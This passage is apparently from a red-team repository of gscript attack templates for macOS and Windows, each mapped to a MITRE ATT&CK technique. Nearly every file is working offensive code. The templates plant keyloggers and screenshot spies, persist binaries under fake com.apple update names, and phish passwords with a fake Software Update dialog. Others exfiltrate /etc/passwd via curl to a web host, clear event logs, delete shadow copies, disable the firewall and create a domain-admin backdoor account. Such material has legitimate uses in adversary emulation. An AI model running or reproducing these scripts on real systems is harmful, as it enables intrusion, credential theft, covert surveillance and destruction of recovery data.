22 | return true;
23 | }
24 |
25 | function Deploy() {
26 | ForkExecuteCommand("systemsetup", ["-setremotelogin", "on"]);
27 | return true;
28 | }
29 |
30 | function AfterDeploy() {
31 | LogInfo("Enabling remoteSSH connection");
32 | return true;
33 | }
34 |
--------------------------------------------------------------------------------
/beta/attack/os_x/example_agent.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Label
6 | com.apple.updates
7 | ProgramArguments
8 |
9 | /usr/local/agent_example
10 |
11 | RunAtLoad
12 |
13 |
14 |
--------------------------------------------------------------------------------
/beta/attack/os_x/example_daemon.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Label
6 | com.apple.updatesd
7 | UserName
8 | root
9 | GroupName
10 | wheel
11 | Nice
12 | 20
13 | KeepAlive
14 |
15 | OnDemand
16 |
17 | RunAtLoad
18 |
19 | AbandonProcessGroup
20 |
21 | WorkingDirectory
22 | /usr/local/
23 | ProgramArguments
24 |
25 | /usr/local/daemon_example
26 |
27 | StandardErrorPath
28 | /Library/Logs/error.log
29 | StandardOutPath
30 | /Library/Logs/output.log
31 | ProcessType
32 | Background
33 |
34 |
35 |
--------------------------------------------------------------------------------
/beta/attack/os_x/grab_clipboard.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Grab Clipboard
3 | // Author: ahhh
4 | // Purpose: Grabs the contents of the clipboard to be written to a file or exfiltrated
5 | // Gscript version: 0.1.2
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1115
7 |
8 | //priority:150
9 | //timeout:150
10 |
11 | function BeforeDeploy() {
12 | LogInfo("Starting Clipboard Data");
13 | return true;
14 | }
15 |
16 | function Deploy() {
17 | var response = ExecuteCommand("pbpaste", [""]);
18 | LogInfo(response.retObject.Stdout);
19 | return true;
20 | }
21 |
22 | function AfterDeploy() {
23 | LogInfo("Done Clipboard Data");
24 | return true;
25 | }
--------------------------------------------------------------------------------
/beta/attack/os_x/https_log_exfiltration.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: HTTPS Log Exfiltration
3 | // Author: ahhh
4 | // Purpose: read a file, base64 encode it, send chunks to webserver to be caught in logs
5 | // Gscript version: 0.1.2
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1048
7 |
8 | //priority:90
9 | //timeout:150
10 | //import:/private/tmp/example.macho
11 |
12 | var url = "https://example.com/";
13 | var target_file = "/etc/passwd";
14 |
15 | function BeforeDeploy() {
16 | LogInfo("starting HTTPS Log Exfiltration");
17 | return true;
18 | }
19 |
20 | function Deploy() {
21 |
22 | // Ghetto exfil the target
23 | var target_url = url+"$i";
24 | var command = "/bin/cat "+target_file+" | xxd -ps -c 16 | while read i; do curl "+target_url+"; done;";
25 | var response = ExecuteCommand("sh", ["-c", command]);
26 | LogInfo(response.retObject.Stderr);
27 | LogInfo(response.retObject.Stdout);
28 | return true;
29 |
30 | }
31 |
32 | function AfterDeploy() {
33 | LogInfo("done, HTTPS Log Exfiltration");
34 | return true;
35 | }
--------------------------------------------------------------------------------
/beta/attack/os_x/keylog_spy.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Keylog Spy
3 | // Author: ahhh
4 | // Purpose: Starts recording keylogs, saves them in /var/log/keystroke.log
5 | // Gscript version: 0.1.2
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1056
7 | // Using this keylogger: https://github.com/caseyscarborough/keylogger
8 |
9 | //priority:150
10 | //timeout:150
11 | //import:/private/tmp/keylogger.macho
12 |
13 |
14 | function BeforeDeploy() {
15 | LogInfo("Starting keylogger spy");
16 | return true;
17 | }
18 |
19 | function Deploy() {
20 | // Drop the sample
21 | var spy = Asset("keylogger.macho");
22 | var name = "";
23 | var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
24 | for (var i = 0; i < 6; i++)
25 | name += possible.charAt(Math.floor(Math.random() * possible.length));
26 | name = "/private/tmp/"+name;
27 | WriteFile(name, spy.fileData, 0755);
28 | LogInfo("dropped the spy binary here: "+name);
29 |
30 | ForkExecuteCommand(name, ["/private/tmp/key.log"]);
31 | return true;
32 | }
33 |
34 | function AfterDeploy() {
35 | LogInfo("Done keylogger spy");
36 | return true;
37 | }
38 |
--------------------------------------------------------------------------------
/beta/attack/os_x/launch_agent_persistence.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Launch Agent Persistence
3 | // Author: ahhh
4 | // Purpose: Drop a sample binary and a launch agent plist and persist it using Launch Agent
5 | // Gscript version: 0.1.2
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1159
7 |
8 | //priority:90
9 | //timeout:150
10 | //import:/private/tmp/example.macho
11 | //import:/private/tmp/example_agent.plist
12 |
13 | var plist_name = "com.apple.updates.plist";
14 |
15 | function BeforeDeploy() {
16 | LogInfo("starting execution of Launch Agent Persistence");
17 | return true;
18 | }
19 |
20 | function Deploy() {
21 | // Drop the sample
22 | var example = Asset("example.macho");
23 | var name = "/private/tmp/agent_example";
24 | WriteFile(name, example.fileData, 0755);
25 | LogInfo("dropped the example binary here: "+name);
26 |
27 | // Persist the launch agent plist
28 | var example_agent = Asset("example_agent.plist");
29 | var whoami = GetUser();
30 | var home = "/Users/"+whoami.username;
31 | var location1 = home + "/Library/LaunchAgents/" + plist_name;
32 | var location2 = "/System/Library/LaunchAgents/" + plist_name;
33 | var location3 = "/Library/LaunchAgents/" + plist_name;
34 | WriteFile(location1, example_agent.fileData, 0755);
35 | ExecuteCommand("launchctl", ["load", "-w", location1]);
36 | console.log("Persisted binary using Launch Agent, with the plist: "+location1);
37 |
38 | return true;
39 | }
40 |
41 | function AfterDeploy() {
42 | LogInfo("done, deployed binary with Launch Agent persistence");
43 | return true;
44 | }
--------------------------------------------------------------------------------
/beta/attack/os_x/launch_daemon_persistence.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Launch Daemon Persistence
3 | // Author: ahhh
4 | // Purpose: Drop a sample binary and a launch daemon plist and persist it using Launch Daemon
5 | // Gscript version: 0.1.2
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1160
7 |
8 | //priority:90
9 | //timeout:150
10 | //import:/private/tmp/example.macho
11 | //import:/private/tmp/example_daemon.plist
12 |
13 | var plist_name = "com.apple.updatesd.plist";
14 |
15 | function BeforeDeploy() {
16 | LogInfo("starting execution of Launch Daemon Persistence");
17 | return true;
18 | }
19 |
20 | function Deploy() {
21 | // Drop the sample
22 | var example = Asset("example.macho");
23 | var name = "/private/tmp/daemon_example";
24 | WriteFile(name, example.fileData, 0755);
25 | LogInfo("dropped the example binary here: "+name);
26 |
27 | // Persist the launch agent plist
28 | var example_daemon = Asset("example_daemon.plist");
29 | var location1 = "/System/Library/LaunchDaemons/" + plist_name;
30 | var location2 = "/Library/LaunchDaemons/" + plist_name;
31 | WriteFile(location2, example_daemon.fileData, 0755);
32 | ExecuteCommand("launchctl", ["load", "-w", location2]);
33 | console.log("Persisted binary using Launch Daemon, with the plist: "+location2);
34 |
35 | return true;
36 | }
37 |
38 | function AfterDeploy() {
39 | LogInfo("done, deployed binary with Launch Daemon persistence");
40 | return true;
41 | }
--------------------------------------------------------------------------------
/beta/attack/os_x/launchctl_persistence.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Launchctl Persistence
3 | // Author: ahhh
4 | // Purpose: Drop a sample binary and persist it using Launchctl
5 | // Gscript version: 0.1.2
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1152
7 |
8 | //priority:90
9 | //timeout:150
10 | //import:/private/tmp/example.macho
11 |
12 | var labelname;
13 | var binary_args = "";
14 |
15 | function BeforeDeploy() {
16 | LogInfo("starting execution of Launchctl Persistence");
17 | return true;
18 | }
19 |
20 | function Deploy() {
21 | // Drop the sample
22 | var example = Asset("example.macho");
23 | var name = "";
24 | var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
25 | for (var i = 0; i < 5; i++)
26 | name += possible.charAt(Math.floor(Math.random() * possible.length));
27 | name = "/private/tmp/"+name;
28 | WriteFile(name, example.fileData, 0755);
29 | LogInfo("dropped the example binary here: "+name);
30 |
31 | // Persist the sample
32 | var label = "";
33 | for (var i = 0; i < 5; i++)
34 | label += possible.charAt(Math.floor(Math.random() * possible.length));
35 | label = "com.apple."+label;
36 | ExecuteCommand("launchctl", ["submit", "-l", label, "--", name]);
37 | console.log("Persisted binary using launchctl, with the label: "+label);
38 |
39 | return true;
40 | }
41 |
42 | function AfterDeploy() {
43 | LogInfo("done, deployed binary with Launchctl persistence");
44 | return true;
45 | }
--------------------------------------------------------------------------------
/beta/attack/os_x/loginhook_persistence.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: LoginHook Persistence
3 | // Author: ahhh
4 | // Purpose: Drop a sample binary and persist it using a default Login Hook
5 | // Gscript version: 0.1.2
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1037
7 |
8 | //priority:90
9 | //timeout:150
10 | //import:/private/tmp/example.macho
11 |
12 | function BeforeDeploy() {
13 | LogInfo("starting execution of Login Hook Persistence");
14 | return true;
15 | }
16 |
17 | function Deploy() {
18 | // Drop the sample
19 | var example = Asset("example.macho");
20 | var name = "";
21 | var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
22 | for (var i = 0; i < 5; i++)
23 | name += possible.charAt(Math.floor(Math.random() * possible.length));
24 | name = "/private/tmp/"+name;
25 | WriteFile(name, example.fileData, 0755);
26 | LogInfo("dropped the example binary here: "+name);
27 |
28 | // Persist the sample
29 | ExecuteCommand("defaults", ["write", "com.apple.loginwindow", "LoginHook", name]);
30 | console.log("Persisted binary using com.apple.loginwindow LoginHook");
31 |
32 | return true;
33 | }
34 |
35 | function AfterDeploy() {
36 | LogInfo("done, deployed binary with Login Hook persistence");
37 | return true;
38 | }
--------------------------------------------------------------------------------
/beta/attack/os_x/logouthook_persistence.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: LogoutHook Persistence
3 | // Author: ahhh
4 | // Purpose: Drop a sample binary and persist it using a default Logout Hook
5 | // Gscript version: 0.1.2
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1037
7 |
8 | //priority:90
9 | //timeout:150
10 | //import:/private/tmp/example.macho
11 |
12 | function BeforeDeploy() {
13 | LogInfo("starting execution of LogoutHook Persistence");
14 | return true;
15 | }
16 |
17 | function Deploy() {
18 | // Drop the sample
19 | var example = Asset("example.macho");
20 | var name = "";
21 | var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
22 | for (var i = 0; i < 5; i++)
23 | name += possible.charAt(Math.floor(Math.random() * possible.length));
24 | name = "/private/tmp/"+name;
25 | WriteFile(name, example.fileData, 0755);
26 | LogInfo("dropped the example binary here: "+name);
27 |
28 | // Persist the sample, must use the com name of an existing plist in ~/Library/Preferences/
29 | ExecuteCommand("defaults", ["write", "com.apple.loginwindow", "LogoutHook", name]);
30 | LogInfo("Persisted binary using com.apple.loginwindow LogoutHook");
31 |
32 | return true;
33 | }
34 |
35 | function AfterDeploy() {
36 | LogInfo("done, deployed binary with LogoutHook persistence");
37 | return true;
38 | }
39 |
--------------------------------------------------------------------------------
/beta/attack/os_x/osascript_prompt.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Osascript Prompt
3 | // Author: ahhh
4 | // Purpose: Prompts the user for their password with the builtin Osascript
5 | // Gscript version: 0.1.2
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1141
7 |
8 | //priority:150
9 | //timeout:150
10 |
11 | function BeforeDeploy() {
12 | LogInfo("Starting Osascript Prompt");
13 | return true;
14 | }
15 |
16 | function Deploy() {
17 | var first = 'tell app "System Preferences" to activate';
18 | var second = 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"';
19 | var response = ExecuteCommand("osascript", ["-e", first, "-e", first, "-e", second]);
20 | LogInfo(response.retObject.Stdout);
21 | return true;
22 | }
23 |
24 | function AfterDeploy() {
25 | LogInfo("Done Osascript Prompt");
26 | return true;
27 | }
--------------------------------------------------------------------------------
/beta/attack/os_x/rccommon_persistence.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: RC.Commong Persistence
3 | // Author: ahhh
4 | // Purpose: rc.common Persistence
5 | // Gscript version: 0.1.2
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1163
7 |
8 | //priority:150
9 | //timeout:150
10 |
11 | //import:/private/tmp/merlinagent.macho
12 | //import:/private/tmp/merlin_osx_runner.sh
13 |
14 | function BeforeDeploy() {
15 | LogInfo("Starting rc.common persistence");
16 | return true;
17 | }
18 |
19 | function Deploy() {
20 | // drop the agent
21 | var merlin = Asset("merlinagent.macho");
22 | var fn = "/Library/merlin";
23 | WriteFile(fn, merlin.fileData, 0755);
24 | LogInfo("dropped a merlin agent");
25 |
26 | // Drop the runner script
27 | var script = Asset("merlin_osx_runner.sh");
28 | var fn2 = "/Library/runner";
29 | WriteFile(fn2, script.fileData, 0755);
30 | LogInfo("dropped the runner script");
31 |
32 | // Set the rc.common persistence
33 | var file_location = "/etc/rc.common";
34 | LogInfo("File Location: "+ file_location);
35 | var rc_common_bytes = StringToByteArray("sh "+ fn2);
36 | var does = FileExists(file_location);
37 | LogInfo("file already exists, so appending");
38 | var obj = AppendFileBytes(file_location, rc_common_bytes);
39 | LogInfo(obj.fileError);
40 | return true;
41 | }
42 |
43 | function AfterDeploy() {
44 | LogInfo("Done rc.common persistence");
45 | return true;
46 | }
47 |
--------------------------------------------------------------------------------
/beta/attack/os_x/screenshot_spy.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Screenshot Spy
3 | // Author: ahhh
4 | // Purpose: Takes screenshots of the desktop every halfhour for the next 24 hours (48 x 1800)
5 | // Gscript version: 0.1.2
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1113
7 | // Using GoRedSpy to take screenshots: https://github.com/ahhh/GoRedSpy
8 |
9 | //priority:150
10 | //timeout:150
11 | //import:/private/tmp/GoRedSpy.macho
12 |
13 |
14 | function BeforeDeploy() {
15 | LogInfo("Starting GoRedSpy");
16 | return true;
17 | }
18 |
19 | function Deploy() {
20 | // Drop the sample
21 | var spy = Asset("GoRedSpy.macho");
22 | var name = "";
23 | var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
24 | for (var i = 0; i < 5; i++)
25 | name += possible.charAt(Math.floor(Math.random() * possible.length));
26 | name = "/private/tmp/"+name;
27 | WriteFile(name, spy.fileData, 0755);
28 | LogInfo("dropped the spy binary here: "+name);
29 |
30 | ForkExecuteCommand(name, ["-outDir", "/private/tmp", "-count", "48", "-delay", "1800s"]);
31 | return true;
32 | }
33 |
34 | function AfterDeploy() {
35 | LogInfo("Done GoRedSpy");
36 | return true;
37 | }
38 |
--------------------------------------------------------------------------------
/beta/attack/os_x/service_persistence.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Service Persistence
3 | // Author: ahhh
4 | // Purpose: Drop a sample binary and persist it using a default gscript service install
5 | // Gscript version: 0.1.2
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1050
7 |
8 | //priority:100
9 | //timeout:30
10 | //import:/private/tmp/example.macho
11 |
12 | var service_label = "Gscript Daemon";
13 | var service_name = "gscriptdaemon";
14 | var service_desc = "this is a test daemon.";
15 |
16 | function BeforeDeploy() {
17 | LogInfo("Starting install service persistence.");
18 | return true;
19 | }
20 |
21 | function Deploy() {
22 | // Drop the sample
23 | var example = Asset("example.macho");
24 | var path = "";
25 | var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
26 | for (var i = 0; i < 5; i++)
27 | path += possible.charAt(Math.floor(Math.random() * possible.length));
28 | path = "/private/tmp/"+path;
29 | WriteFile(path, example.fileData, 0755);
30 | LogInfo("dropped the example binary here: "+path);
31 |
32 | InstallSystemService(path, service_name, service_label, service_desc);
33 | LogInfo("Service Installed");
34 | StartServiceByName(service_name);
35 | LogInfo("Service Started");
36 | return true;
37 | }
38 |
39 | function AfterDeploy() {
40 | //StopServiceByName("gscriptdaemon");
41 | //LogInfo("service stopped");
42 | //Sleep(5)
43 | //RemoveServiceByName("gscriptdaemon");
44 | //LogInfo("service removed");
45 | return true;
46 | }
47 |
--------------------------------------------------------------------------------
/beta/attack/os_x/tamper_histcontrol.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Tamper Histcontrol
3 | // Author: ahhh
4 | // Purpose: sets HISTCONTROL=ignorespace for bash shells,
5 | // such that a malicious user can launch new terminals and use a single space before a command to evade the history file
6 | // Gscript version: 0.1.2
7 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1148
8 |
9 | //priority:150
10 | //timeout:150
11 |
12 | function BeforeDeploy() {
13 | LogInfo("Starting Tamper Histcontrol");
14 | return true;
15 | }
16 |
17 | function Deploy() {
18 | var whoami = GetUser();
19 | var file_location = "/Users/"+whoami.username+"/.bash_profile";
20 | LogInfo("File Location: "+ file_location);
21 | var histcontrol_bytes = StringToByteArray("HISTCONTROL=ignorespace \r\n");
22 | var does = FileExists(file_location);
23 | if (does.FileExists) {
24 | LogInfo("file already exists, so appending");
25 | var obj = AppendFileBytes(file_location, histcontrol_bytes);
26 | LogInfo(obj.fileError);
27 | } else {
28 | WriteFile(file_location, histcontrol_bytes, 0755);
29 | }
30 | return true;
31 | }
32 |
33 | function AfterDeploy() {
34 | LogInfo("Done Tamper Histcontrol");
35 | return true;
36 | }
--------------------------------------------------------------------------------
/beta/attack/os_x/trap_persistence.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Trap Persistence
3 | // Author: ahhh
4 | // Purpose: Drop a sample binary and persist it using Trap
5 | // Gscript version: 0.1.2
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1154
7 |
8 | //priority:90
9 | //timeout:150
10 | //import:/private/tmp/example.macho
11 |
12 | function BeforeDeploy() {
13 | LogInfo("starting execution of Trap Persistence");
14 | return true;
15 | }
16 |
17 | function Deploy() {
18 | // Drop the sample
19 | var example = Asset("example.macho");
20 | var name = "";
21 | var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
22 | for (var i = 0; i < 5; i++)
23 | name += possible.charAt(Math.floor(Math.random() * possible.length));
24 | name = "/private/tmp/"+name;
25 | WriteFile(name, example.fileData, 0755);
26 | LogInfo("dropped the example binary here: "+name);
27 |
28 | // Persist our binary w/ a trap on SIGINT (signal 2), using .bash_profile to get it into the builtin shell
29 | var whoami = GetUser();
30 | var file_location = "/Users/"+whoami.username+"/.bash_profile";
31 | LogInfo("File Location: "+ file_location);
32 | var trap_bytes = StringToByteArray("trap " + name + " 2 \r\n");
33 | var does = FileExists(file_location);
34 | if (does.FileExists) {
35 | LogInfo("file already exists, so appending");
36 | var obj = AppendFileBytes(file_location, trap_bytes);
37 | LogInfo(obj.fileError);
38 | } else {
39 | LogInfo("file does not exist, so creating it");
40 | WriteFile(file_location, trap_bytes, 0755);
41 | }
42 | LogInfo("Persisted binary using trap, for SIGINT, so the .bash_profile");
43 |
44 | return true;
45 | }
46 |
47 | function AfterDeploy() {
48 | LogInfo("done, deployed binary with Trap persistence");
49 | return true;
50 | }
--------------------------------------------------------------------------------
/beta/attack/skeleton.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Skeleton
3 | // Author: ahhh
4 | // Purpose:
5 | // Gscript version: 0.1.0
6 | // ATT&CK:
7 |
8 | //priority:150
9 | //timeout:150
10 |
11 | function BeforeDeploy() {
12 |
13 | return true;
14 | }
15 |
16 | function Deploy() {
17 |
18 | return true;
19 | }
20 |
21 | function AfterDeploy() {
22 |
23 | return true;
24 | }
--------------------------------------------------------------------------------
/beta/attack/windows/delete_event_logs.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Delete Event Logs
3 | // Author: ahhh
4 | // Purpose: Deletes a number of critical security event logs on a Windows machine
5 | // Gscript version: 0.1.2
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1070
7 |
8 | //priority:150
9 | //timeout:150
10 |
11 | function BeforeDeploy() {
12 | LogInfo("starting execution of Delete Event Logs");
13 | return true;
14 | }
15 |
16 | function Deploy() {
17 | ExecuteCommand("powershell.exe", ["Clear-EventLog", "Security, Application, System"]);
18 | ExecuteCommand("powershell.exe", ["Clear-EventLog", "Windows, PowerShell"]);
19 | ExecuteCommand("powershell.exe", ["Clear-EventLog", "Sysmon"]);
20 | LogInfo("Cleared Event Logs");
21 | return true;
22 | }
23 |
24 | function AfterDeploy() {
25 | LogInfo("done Delete Event Logs");
26 | return true;
27 | }
--------------------------------------------------------------------------------
/beta/attack/windows/delete_volume_shadow_copy.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Delete Volume Shadow Copy
3 | // Author: ahhh
4 | // Purpose: Deletes the volume shadow copy with both wmic and vssadmin
5 | // Gscript version: 0.1.1
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1107
7 |
8 | //priority:100
9 | //timeout:150
10 |
11 | var fn;
12 |
13 | function BeforeDeploy() {
14 | LogInfo("starting execution of Delete Volume Shadow Copy");
15 | return true;
16 | }
17 |
18 | function Deploy() {
19 | // Delete the volume shadow copy with the vssadmin tool
20 | ForkExecuteCommand("vssadmin.exe", ["delete", "shadows", "/for=c:", "/oldest", "/quiet"]);
21 | LogInfo("Deleted the volume shadow copy with the vssadmin tool");
22 |
23 | // Delete the volume shadow copy with wmic
24 | ForkExecuteCommand("wmic.exe", ["shadowcopy", "delete", "/nointeractive"]);
25 | LogInfo("Deleted the volume shadow copy with wmic");
26 |
27 | return true;
28 | }
29 |
30 | function AfterDeploy() {
31 | LogInfo("done Deleting VSC");
32 | return true;
33 | }
--------------------------------------------------------------------------------
/beta/attack/windows/disable_windows_firewall.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Disable Windows Firewall
3 | // Author: ahhh
4 | // Purpose: Drops the windows firewall by turning it off.
5 | // Gscript version: 0.1.2
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1089
7 |
8 | //priority:150
9 | //timeout:150
10 |
11 | function BeforeDeploy() {
12 | LogInfo("Starting Disable Windows Firewall");
13 | return true;
14 | }
15 |
16 | function Deploy() {
17 | ExecuteCommand("netsh", ["advfirewall", "set", "allprofiles", "state", "off"]);
18 | return true;
19 | }
20 |
21 | function AfterDeploy() {
22 | LogInfo("Done Disable Windows Firewall");
23 | return true;
24 | }
--------------------------------------------------------------------------------
/beta/attack/windows/keylog_spy.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Keylog Spy
3 | // Author: ahhh
4 | // Purpose: Takes screenshots of the desktop every halfhour for the next 24 hours (48 x 1800)
5 | // Gscript version: 0.1.2
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1056
7 | // Using ShyGuy:
8 |
9 | //priority:150
10 | //timeout:150
11 | //import:/private/tmp/ShyGuy_x64.dll
12 |
13 |
14 | function BeforeDeploy() {
15 | LogInfo("Starting Keylog");
16 | return true;
17 | }
18 |
19 | function Deploy() {
20 | // Drop the sample
21 | var spy = Asset("ShyGuy_x64.dll");
22 | var name = "";
23 | var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
24 | for (var i = 0; i < 5; i++)
25 | name += possible.charAt(Math.floor(Math.random() * possible.length));
26 | name = "C:\\Users\\Public\\" + name + ".dll";
27 | WriteFile(name, spy.fileData, 0755);
28 | LogInfo("dropped the spy binary here: " + name);
29 | name = name + ",dllmain";
30 | ForkExecuteCommand("C:\\Windows\\System32\\rundll32.exe", [name]);
31 | return true;
32 | }
33 |
34 | function AfterDeploy() {
35 | LogInfo("Done Keylog");
36 | return true;
37 | }
38 |
--------------------------------------------------------------------------------
/beta/attack/windows/net_user_creation.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Net User Creation
3 | // Author: ahhh
4 | // Purpose: add a local user, domain user, add them to local administrators and domain administrators groups
5 | // Gscript version: 0.1.1
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1136
7 |
8 | //priority:100
9 | //timeout:150
10 |
11 | var fn;
12 |
13 | function BeforeDeploy() {
14 | LogInfo("starting execution of Net User Creation");
15 | return true;
16 | }
17 |
18 | function Deploy() {
19 | // Add a local user
20 | ForkExecuteCommand("net.exe", ["user", "spoderman", "TheAmazing", "/add", "/fullname:Spoder Man"]);
21 | LogInfo("Added a local user spoderman");
22 |
23 | // Add a domain user
24 | ForkExecuteCommand("net.exe", ["user", "spoderman", "TheAmazing", "/add", "/fullname:Spoder Man", "/domain"]);
25 | LogInfo("Added a domain user spoderman");
26 |
27 | // Add the user to Adminsistrators group
28 | ForkExecuteCommand("net.exe", ["group", "Administrators", "spoderman", "/add"]);
29 | LogInfo("Added spoderman to the Administrators group");
30 |
31 | // Add the user to the Domain Adminsistrators group
32 | ForkExecuteCommand("net.exe", ["group", "Domain Admins", "spoderman", "/add", "/domain"]);
33 | LogInfo("Added spoderman to the Domain Administrators group");
34 |
35 | // Add the user to the Domain Adminsistrators group
36 | ForkExecuteCommand("net.exe", ["localgroup", "Administrators", "spoderman", "/add"]);
37 | LogInfo("Added spoderman to the local Administrators group");
38 |
39 | return true;
40 | }
41 |
42 | function AfterDeploy() {
43 | // Removed the local user spoderman
44 | ForkExecuteCommand("net.exe", ["user", "spoderman", "/delete"]);
45 | LogInfo("Removed the local user spoderman");
46 |
47 | // Removed the domain user spoderman
48 | ForkExecuteCommand("net.exe", ["user", "spoderman", "/delete", "/domain"]);
49 | LogInfo("Removed the local user spoderman");
50 |
51 | LogInfo("done Net User Creation");
52 | return true;
53 | }
--------------------------------------------------------------------------------
/beta/attack/windows/runkey_persistence.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: CurrentVersion Run Persistence
3 | // Author: ahhh
4 | // Purpose: Drop a sample binary and persist it using a CurrentVersion\Run regkey
5 | // Gscript version: 0.1.1
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1112
7 |
8 | //priority:90
9 | //timeout:150
10 | //import:/private/tmp/example.exe
11 |
12 | var fn;
13 |
14 | function BeforeDeploy() {
15 | LogInfo("starting execution of Run Key Persistence");
16 | return true;
17 | }
18 |
19 | function Deploy() {
20 | // Drop the sample
21 | var example = Asset("example.exe");
22 | var name = "";
23 | var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
24 | for (var i = 0; i < 5; i++)
25 | name += possible.charAt(Math.floor(Math.random() * possible.length));
26 | name = name+".exe";
27 | var path = WriteTempFile(name, example.fileData);
28 | LogInfo("dropped the example binary here: "+path.fullpath);
29 |
30 | // Persist the sample
31 | AddRegKeyString("CURRENT_USER", "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "ExampleExe", path.fullpath);
32 | console.log("Adding a reg key for current user run");
33 |
34 | // Execute the sample
35 | //ForkExecuteCommand("powershell", ["-NoLogo", "-WindowStyle", "hidden", "-ep", "bypass", path.fullpath]);
36 | //LogInfo("executed the example binary");
37 | return true;
38 | }
39 |
40 | function AfterDeploy() {
41 | LogInfo("done, deployed binary with run key persistence");
42 | return true;
43 | }
--------------------------------------------------------------------------------
/beta/attack/windows/screenshot_spy.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Screenshot Spy
3 | // Author: ahhh
4 | // Purpose: Takes screenshots of the desktop every halfhour for the next 24 hours (48 x 1800)
5 | // Gscript version: 0.1.2
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1113
7 | // Using GoRedSpy to take screenshots: https://github.com/ahhh/GoRedSpy
8 |
9 | //priority:150
10 | //timeout:150
11 | //import:/private/tmp/GoRedSpy.exe
12 |
13 |
14 | function BeforeDeploy() {
15 | LogInfo("Starting GoRedSpy");
16 | return true;
17 | }
18 |
19 | function Deploy() {
20 | // Drop the sample
21 | var spy = Asset("GoRedSpy.exe");
22 | var name = "";
23 | var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
24 | for (var i = 0; i < 5; i++)
25 | name += possible.charAt(Math.floor(Math.random() * possible.length));
26 | name = "C:\\Users\\Public\\" + name + ".exe";
27 | WriteFile(name, spy.fileData, 0755);
28 | LogInfo("dropped the spy binary here: " + name);
29 |
30 | ForkExecuteCommand(name, ["-outDir", "C:\\Users\\Public\\", "-count", "48", "-delay", "1800s"]);
31 | return true;
32 | }
33 |
34 | function AfterDeploy() {
35 | LogInfo("Done GoRedSpy");
36 | return true;
37 | }
38 |
--------------------------------------------------------------------------------
/beta/attack/windows/startup_persistence.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Startup Persistence
3 | // Author: ahhh
4 | // Purpose: Drop a sample binary and persist it using a script in the Startup folder
5 | // Gscript version: 0.1.1
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1060
7 |
8 | //priority:90
9 | //timeout:150
10 | //import:/private/tmp/example.exe
11 |
12 | var fn;
13 |
14 | function BeforeDeploy() {
15 | LogInfo("starting execution of Startup Persistence");
16 | return true;
17 | }
18 |
19 | function Deploy() {
20 | // Drop the sample
21 | var example = Asset("example.exe");
